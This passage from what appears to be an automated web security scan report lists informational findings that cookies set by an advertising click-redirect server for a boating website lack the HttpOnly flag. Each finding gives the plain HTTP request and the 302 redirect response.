Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/
...[SNIP]...

14.431. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1159061525/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1159061525/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1159061525/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:18:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

14.432. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1174768862/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1174768862/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1174768862/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i
...[SNIP]...

14.433. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1187342870/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1187342870/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1187342870/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:09:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/
...[SNIP]...

14.434. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1203869454/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1203869454/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1203869454/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

14.435. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1212301165/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1212301165/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1212301165/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

14.436. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1263431205/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1263431205/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1263431205/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

14.437. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1287458599/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1287458599/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1287458599/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i
...[SNIP]...

14.438. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1304908327/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1304908327/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1304908327/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/
...[SNIP]...

14.439. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1324381451/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1324381451/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1324381451/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:06:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

14.440. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1398468739/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1398468739/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1398468739/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:50:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.marinalife.com/soundings
Content-Length: 312
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.marinalife.com/soundings">here</a>.<
...[SNIP]...

14.441. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1399245462/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1399245462/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1399245462/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:11:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

14.442. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1415426878/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1415426878/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1415426878/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:29 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

14.443. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1431245089/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1431245089/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1431245089/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:23:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i
...[SNIP]...

14.444. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1436265523/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1436265523/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1436265523/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:48:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

14.445. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1446678663/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1446678663/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
